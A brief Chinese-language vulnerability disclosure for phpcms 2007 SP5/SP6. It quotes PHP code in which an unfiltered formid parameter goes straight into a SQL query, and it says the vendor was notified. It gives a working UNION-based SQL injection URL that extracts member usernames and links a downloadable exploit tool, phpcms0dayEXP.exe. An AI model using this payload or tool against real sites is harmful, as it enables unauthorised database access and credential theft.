影响版本：2007SP5  SP6
漏洞文件：/formguide/include/tag.func.php
Author：backerhack 小蟑螂
信息来源：零客网安 www.0kee.com

{
    global $db,$MOD,$MODULE;
    $formid = (!isset($formid)||$formid=='') ? 0 : $formid;
    $query = "SELECT * FROM ".TABLE_FORMGUIDE." WHERE formid=$formid limit 1";
    $r = $db->get_one($query);
    if(!$r)
    {
        echo $LANG['not_exist_form'];
        return '';   
    }

变量formid未赋值且过滤不严带入查询导致注入。
测试：http://phpcmsroot/formguide/index.php?formid=1/**/and/**/1=2/**/union/**/select/**/1,username,3,4,5,6,7/**/from/**/phpcms_member/**/where/**/userid=1/*
附上sniperhg写的利用工具… 写的真的很强大，赞一个！
phpcms0dayEXP.exe    MD5值：cae31a3ef566ed06068473d787d76359
本文发表前已通知官方。

工具点击下载：phpcms0dayEXP